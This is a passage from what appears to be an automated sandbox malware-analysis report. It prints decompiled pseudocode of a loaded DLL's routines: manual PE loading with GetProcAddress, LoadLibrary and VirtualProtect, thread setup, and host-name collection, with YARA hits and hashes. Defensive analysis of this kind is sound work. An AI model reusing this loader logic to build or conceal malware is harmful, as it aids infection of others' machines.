                                0x10001c23
                                0x10001c31
                                0x10001c38
                                0x10001c3b
                                0x10001c3e
                                0x10001c46
                                0x00000000
                                0x00000000
                                0x10001bf6
                                0x10001bf6
                                0x10001c48
                                0x10001c55
                                0x10001c6a
                                0x10001c57
                                0x10001c60
                                0x10001c65
                                0x10001c7b
                                0x10001c7b
                                0x10001c8a
                                0x10001c90

                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,74E063F0,00003000,00000004,00000030,00000000,74E063F0,00000000,?,?,?,?,?,?,100015B5,00000000), ref: 10001BC5
                                • memcpy.NTDLL(?,100015B5,74E063F0,?,?,?,?,?,?,100015B5,00000000,00000030,74E063F0,00000000), ref: 10001C60
                                • VirtualFree.KERNELBASE(100015B5,00000000,00008000,?,?,?,?,?,?,100015B5,00000000), ref: 10001C7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFreememcpy
                                • String ID: Sep 21 2021
                                • API String ID: 4010158826-1195158264
                                • Opcode ID: 4a200aa85f58a821f5f9962b291cb76fc4535fc65e25120b76f29fa374006b7d
                                • Instruction ID: 952fea5554e6ea9c6b6d701a00e5359ec4800a23aeca9bf1122bd908d9cf0ac5
                                • Opcode Fuzzy Hash: 4a200aa85f58a821f5f9962b291cb76fc4535fc65e25120b76f29fa374006b7d
                                • Instruction Fuzzy Hash: 75312175D40219EBEB01CF94CD81BDEB7B8FF08344F104169EA05BB245DB71AA45CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 10001CE7, Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                                Download Yara Rule
                                C-Code - Quality: 87%
                                			E10001CE7(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E10001540(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}







                                0x10001cf0
                                0x10001cf5
                                0x10001d03
                                0x10001d08
                                0x10001d08
                                0x10001d0e
                                0x10001d13
                                0x10001d17
                                0x10001d1b
                                0x10001d1b
                                0x10001d25
                                0x10001d2e

                                APIs
                                • GetCurrentThread.KERNEL32 ref: 10001CEA
                                • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 10001CF5
                                • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 10001D08
                                • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 10001D1B
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Thread$Priority$AffinityCurrentMask
                                • String ID:
                                • API String ID: 1452675757-0
                                • Opcode ID: d56f78b7c5b401a37c28ed4cd59cf0cc51a118dddb6064f75b73a294fd21ba0e
                                • Instruction ID: e4b3be2930a2d30c1a8d1367e94e89244ea36a12442c579d3d569057e20ce27f
                                • Opcode Fuzzy Hash: d56f78b7c5b401a37c28ed4cd59cf0cc51a118dddb6064f75b73a294fd21ba0e
                                • Instruction Fuzzy Hash: 9BE092313076216BF2126B294CC4EAB679CEF913F17124226F621922E4DF548C0189A5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D44A2A, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                Download Yara Rule
                                C-Code - Quality: 47%
                                			E00D44A2A(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E00D41525(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0xd4c284); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                                0x00d44a2e
                                0x00d44a3b
                                0x00d44a3d
                                0x00d44a3e
                                0x00d44a46
                                0x00d44a46
                                0x00d44a4a
                                0x00000000
                                0x00000000
                                0x00d44a41
                                0x00d44a42
                                0x00d44a45
                                0x00d44a45
                                0x00d44a52
                                0x00d44a57
                                0x00d44a5c
                                0x00d44a64
                                0x00d44a6a
                                0x00d44a6c
                                0x00d44a6f
                                0x00d44a73
                                0x00d44a75
                                0x00d44a78
                                0x00d44a78
                                0x00d44a79
                                0x00d44a7b
                                0x00d44a78
                                0x00d44a85
                                0x00d44a88
                                0x00d44a8b
                                0x00d44a8c
                                0x00d44a8e
                                0x00d44a95
                                0x00d44a95
                                0x00d44aa1

                                APIs
                                • StrChrA.SHLWAPI(?,00000020,00000000,032895AC,00D430F3,?,00D41173,?,032895AC,?,00D430F3), ref: 00D44A46
                                • StrTrimA.SHLWAPI(?,00D4C284,00000002,?,00D41173,?,032895AC,?,00D430F3), ref: 00D44A64
                                • StrChrA.SHLWAPI(?,00000020,?,00D41173,?,032895AC,?,00D430F3), ref: 00D44A6F
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Trim
                                • String ID:
                                • API String ID: 3043112668-0
                                • Opcode ID: c495d9c65593111af8b77b6e4842dbc7902bb0ffe57968b0b3fc5692694864ee
                                • Instruction ID: ea48d51cfa330882fdcaab16272ed7249b89fb37741691c9e22050a3aab40bbb
                                • Opcode Fuzzy Hash: c495d9c65593111af8b77b6e4842dbc7902bb0ffe57968b0b3fc5692694864ee
                                • Instruction Fuzzy Hash: 1501A2723803066FE7204E6A8C4AF6B7F9DEBC5758F189011B985CB292DA70CC82C774
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D48B22, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00D48B22(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0xd4d238, 0, _a4); // executed
				return _t2;
			}




                                0x00d48b2e
                                0x00d48b34

                                APIs
                                • RtlFreeHeap.NTDLL(00000000,00000000,00D4131A,00000000,?,?,00000000), ref: 00D48B2E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: Ut
                                • API String ID: 3298025750-8415677
                                • Opcode ID: a7a3a0d716b5dd59436ea2e2405312eebbb9b875aaf8288a9f3d2aa460666cc8
                                • Instruction ID: 8afacc947ef5d6a9df795bbe59a216ee04b0f893f1bc73430b26a25e0ad1d3dc
                                • Opcode Fuzzy Hash: a7a3a0d716b5dd59436ea2e2405312eebbb9b875aaf8288a9f3d2aa460666cc8
                                • Instruction Fuzzy Hash: F9B01279100300EBCB114F50DE04F05FA22AB51700F004010F3048817487724420FB39
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D476E7, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                Download Yara Rule
                                C-Code - Quality: 75%
                                			E00D476E7(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00D48A19(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xd4d2a8; // 0x253a5a8
						_t20 = _t68 + 0xd4e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00D4A6BC(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                0x00d476ed
                                0x00d476f0
                                0x00d47700
                                0x00d47709
                                0x00d4770d
                                0x00d477db
                                0x00d477e1
                                0x00d477e1
                                0x00d47727
                                0x00d4772c
                                0x00d47730
                                0x00d47736
                                0x00d4773b
                                0x00d47742
                                0x00d47751
                                0x00d47751
                                0x00d47755
                                0x00d47757
                                0x00d47763
                                0x00d4776e
                                0x00d47779
                                0x00d4777d
                                0x00d47787
                                0x00d4778b
                                0x00d4778d
                                0x00d47792
                                0x00d47799
                                0x00d477a9
                                0x00d477a9
                                0x00d47792
                                0x00d4778b
                                0x00d477ab
                                0x00d477b0
                                0x00d477b5
                                0x00d477b5
                                0x00d477b8
                                0x00d477c1
                                0x00d477c6
                                0x00d477c6
                                0x00d477cb
                                0x00d477d0
                                0x00d477d0
                                0x00d477cb
                                0x00d47755
                                0x00d477d2
                                0x00d477d8
                                0x00000000

                                APIs
                                  • Part of subcall function 00D48A19: SysAllocString.OLEAUT32(80000002), ref: 00D48A76
                                  • Part of subcall function 00D48A19: SysFreeString.OLEAUT32(00000000), ref: 00D48ADC
                                • SysFreeString.OLEAUT32(?), ref: 00D477C6
                                • SysFreeString.OLEAUT32(00D44BD8), ref: 00D477D0
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloc
                                • String ID:
                                • API String ID: 986138563-0
                                • Opcode ID: 7092e7ac2725821d11f00c11c6ee795dbcc056099171288f4ed35890781a9646
                                • Instruction ID: 95c9b1537adf7fab3bac018ec2e758e4a9b71378c5b2560508291717e0c3389b
                                • Opcode Fuzzy Hash: 7092e7ac2725821d11f00c11c6ee795dbcc056099171288f4ed35890781a9646
                                • Instruction Fuzzy Hash: A7312876900159AFCB11DF98C888C9BBB7AFFC97407544658F9159B220E731DD52CBB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 100010F9, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70COMMON
                                Download Yara Rule
                                C-Code - Quality: 86%
                                			E100010F9(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x10004140;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x10004140 - 0x69b24f45 &  !( *0x10004140 - 0x69b24f45);
				_t18 = E10001015( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x10004140 - 0x69b24f45 &  !( *0x10004140 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x10004140 - 0x69b24f45 &  !( *0x10004140 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E10001484(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E10001753(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E10001D31(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E1000167E(_t42);
					L8:
					return _t29;
				}
			}














                                0x10001101
                                0x10001103
                                0x1000111f
                                0x10001130
                                0x10001137
                                0x10001195
                                0x00000000
                                0x10001139
                                0x10001139
                                0x10001143
                                0x10001147
                                0x1000114c
                                0x1000114f
                                0x10001154
                                0x10001158
                                0x1000115d
                                0x10001162
                                0x10001166
                                0x1000116b
                                0x1000116c
                                0x10001170
                                0x10001175
                                0x1000117d
                                0x1000117d
                                0x10001175
                                0x10001166
                                0x10001158
                                0x1000117f
                                0x10001188
                                0x1000118c
                                0x10001196
                                0x1000119c
                                0x1000119c

                                APIs
                                  • Part of subcall function 10001015: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,10001135,?,?,?,?,?,00000002,?,?), ref: 10001039
                                  • Part of subcall function 10001015: GetProcAddress.KERNEL32(00000000,?), ref: 1000105B
                                  • Part of subcall function 10001015: GetProcAddress.KERNEL32(00000000,?), ref: 10001071
                                  • Part of subcall function 10001015: GetProcAddress.KERNEL32(00000000,?), ref: 10001087
                                  • Part of subcall function 10001015: GetProcAddress.KERNEL32(00000000,?), ref: 1000109D
                                  • Part of subcall function 10001015: GetProcAddress.KERNEL32(00000000,?), ref: 100010B3
                                  • Part of subcall function 10001484: memcpy.NTDLL(00000002,?,10001143,?,?,?,?,?,10001143,?,?,?,?,?,?,?), ref: 100014BB
                                  • Part of subcall function 10001484: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 100014F0
                                  • Part of subcall function 10001753: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 1000178B
                                  • Part of subcall function 10001D31: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 10001D6A
                                  • Part of subcall function 10001D31: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 10001DDF
                                  • Part of subcall function 10001D31: GetLastError.KERNEL32 ref: 10001DE5
                                • GetLastError.KERNEL32(?,?), ref: 10001177
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                • String ID: @Mt MtTt
                                • API String ID: 2673762927-608512568
                                • Opcode ID: 73f9826342b69bd95c16f9403d7a08d6d88bac57bc6fdfaa1a329a52a4a569d4
                                • Instruction ID: 925ad0b34c57d5628c26617c6f539520a1d0920d3ea155fe0462e5882d104542
                                • Opcode Fuzzy Hash: 73f9826342b69bd95c16f9403d7a08d6d88bac57bc6fdfaa1a329a52a4a569d4
                                • Instruction Fuzzy Hash: 2C11083A600712ABE311EBA58C80DDF77FDEF882D47050569EB0597649DEA0FD068790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 1000169A, Relevance: 3.1, APIs: 2, Instructions: 59stringthreadCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E1000169A() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x10004144;
				if( *0x1000412c > 5) {
					_t16 = _t15 + 0x100050f9;
				} else {
					_t16 = _t15 + 0x100050b1;
				}
				E1000196B(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E100012DC( &_v32,  &_v16,  *0x10004140 ^ 0xf7a71548) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x10004138);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E10001E13(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x10004138 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E10002070(_t44, _t32 + 4);
						}
					}
					_t25 = E100010F9(_v28); // executed
				}
				ExitThread(_t25);
			}















                                0x100016a0
                                0x100016b1
                                0x100016bb
                                0x100016b3
                                0x100016b3
                                0x100016b3
                                0x100016c2
                                0x100016cb
                                0x100016d0
                                0x100016ee
                                0x1000174a
                                0x100016f0
                                0x100016f6
                                0x100016fc
                                0x1000170a
                                0x1000170e
                                0x10001715
                                0x1000171e
                                0x10001722
                                0x10001728
                                0x10001739
                                0x1000172a
                                0x10001730
                                0x10001730
                                0x10001728
                                0x10001741
                                0x10001741
                                0x1000174c

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitThreadlstrlen
                                • String ID:
                                • API String ID: 2636182767-0
                                • Opcode ID: b086c4572dfb4f5fc2dc602d0704e7ace3872482ced9345b5dfcc4d97a26dae3
                                • Instruction ID: 0cf49a4b4e23d9d9ae1aa408ad671cdcffb1bf156085d6e57ed5d2e430731b0c
                                • Opcode Fuzzy Hash: b086c4572dfb4f5fc2dc602d0704e7ace3872482ced9345b5dfcc4d97a26dae3
                                • Instruction Fuzzy Hash: 09116DB1508305ABF721DBA4CC99ECB77ECEB043C1F024926F555D3169EB30E6448B55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D45D79, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00D45D79(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E00D47DDD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0xd4d238, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E00D41037(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








                                0x00d45d79
                                0x00d45d81
                                0x00d45d98
                                0x00d45db3
                                0x00d45db7
                                0x00d45dbc
                                0x00d45dbe
                                0x00d45dd0
                                0x00d45ddc
                                0x00d45dc0
                                0x00d45dc0
                                0x00d45dc5
                                0x00d45dca
                                0x00d45dca
                                0x00d45dbe
                                0x00d45de2
                                0x00d45de6
                                0x00d45de6
                                0x00d45d8d
                                0x00d45d92
                                0x00d45d96
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                  • Part of subcall function 00D41037: SysFreeString.OLEAUT32(00000000), ref: 00D4109A
                                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,00D45356,?,004F0053,03289368,00000000,?), ref: 00D45DDC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Free$HeapString
                                • String ID: Ut
                                • API String ID: 3806048269-8415677
                                • Opcode ID: d7aaa7310d03279ffddc9afa272d2aaeabc171812c532ed77524b3fd6cad86ed
                                • Instruction ID: 1a4fe3ee9409eccf8ceb5f9a3d13dacd67440f72951fff67f9a2d13bc6985a59
                                • Opcode Fuzzy Hash: d7aaa7310d03279ffddc9afa272d2aaeabc171812c532ed77524b3fd6cad86ed
                                • Instruction Fuzzy Hash: 13014B32500A19BBCB229F54DC05FEE7B65EF04790F188025FE099A225D731C960DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D4831C, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E00D4831C(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E00D41525(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E00D48B22(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                0x00d48321
                                0x00d4832c
                                0x00d4832e
                                0x00d48334
                                0x00d48336
                                0x00d4833b
                                0x00d48344
                                0x00d48348
                                0x00d48351
                                0x00d48355
                                0x00d48364
                                0x00d48357
                                0x00d48358
                                0x00d4835d
                                0x00d4835d
                                0x00d48355
                                0x00d48348
                                0x00d4836d

                                APIs
                                • GetComputerNameExA.KERNEL32(00000003,00000000,00D49C7E,74E5F710,00000000,?,?,00D49C7E), ref: 00D48334
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                • GetComputerNameExA.KERNEL32(00000003,00000000,00D49C7E,00D49C7F,?,?,00D49C7E), ref: 00D48351
                                  • Part of subcall function 00D48B22: RtlFreeHeap.NTDLL(00000000,00000000,00D4131A,00000000,?,?,00000000), ref: 00D48B2E
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: ComputerHeapName$AllocateFree
                                • String ID:
                                • API String ID: 187446995-0
                                • Opcode ID: d649dcbaca7dd2701025076dca4249afb896f847c642f986f9726b59540e431c
                                • Instruction ID: 6f932029dddacdfa3c6e845a186afd0c7676fbb41df432c9489ac56d824ad678
                                • Opcode Fuzzy Hash: d649dcbaca7dd2701025076dca4249afb896f847c642f986f9726b59540e431c
                                • Instruction Fuzzy Hash: 2BF05466600205BFEB21DA9E8C05EAF76FCEBC5B90F190055B505E3140EE70DE01A770
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D47EFD, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0xd4d23c) == 0) {
						E00D44DB1();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0xd4d23c) == 1) {
						_t10 = E00D42789(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                0x00d47f04
                                0x00d47f05
                                0x00d47f08
                                0x00d47f3a
                                0x00d47f3c
                                0x00d47f3c
                                0x00d47f0a
                                0x00d47f0b
                                0x00d47f20
                                0x00d47f27
                                0x00d47f29
                                0x00d47f29
                                0x00d47f27
                                0x00d47f0b
                                0x00d47f44

                                APIs
                                • InterlockedIncrement.KERNEL32(00D4D23C), ref: 00D47F12
                                  • Part of subcall function 00D42789: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,00D47F25,?), ref: 00D4279C
                                • InterlockedDecrement.KERNEL32(00D4D23C), ref: 00D47F32
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Interlocked$CreateDecrementHeapIncrement
                                • String ID:
                                • API String ID: 3834848776-0
                                • Opcode ID: d4465f6c86d3ec5d97159493f85987581c3989c520e4b0d43ffd5c3de3e90b3a
                                • Instruction ID: 3849e501258935b6990243139d58eb0f4d152e337d83831204fc69bb4a87bb1e
                                • Opcode Fuzzy Hash: d4465f6c86d3ec5d97159493f85987581c3989c520e4b0d43ffd5c3de3e90b3a
                                • Instruction Fuzzy Hash: 73E08C3130C232978B216BB49C89B6EA640AF21B81F09A454F8C2E11A4DB51CC5892F1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D4933A, Relevance: 1.6, APIs: 1, Instructions: 70synchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00D4933A(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
				intOrPtr _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v60;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t14;
